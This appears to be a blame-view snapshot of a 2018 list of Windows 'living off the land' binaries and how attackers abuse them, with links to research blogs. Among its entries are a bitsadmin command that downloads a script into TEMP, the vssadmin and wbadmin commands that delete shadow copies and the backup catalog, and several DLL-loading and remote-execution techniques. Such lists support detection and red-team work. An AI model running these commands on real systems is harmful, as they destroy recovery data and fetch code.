2018-04-22 15:56:21 +00:00
|
|
|
Ntsd.exe Debugger
|
|
|
|
Kd.exe Debugger
|
|
|
|
Certreq.exe Exfiltrate data
|
|
|
|
Dbghost.exe
|
|
|
|
Robocopy.exe Needs examples
|
|
|
|
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
|
|
|
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
|
|
|
|
notepad.exe Gui - Download files using Open (A lot of other programs as well)
|
|
|
|
netsh.exe Netsh helper dll file loading
|
|
|
|
wbadmin.exe wbadmin delete catalog -quiet
|
|
|
|
psexec.exe Remote execution of code
|
|
|
|
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
|
|
|
|
WinMail.exe DLL Sideloading
|
|
|
|
odbcad32.exe GUI DLL Loading
|
|
|
|
WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
|
|
|
|
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
|
|
|
|
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
|
2018-04-23 16:20:09 +00:00
|
|
|
|
|
|
|
|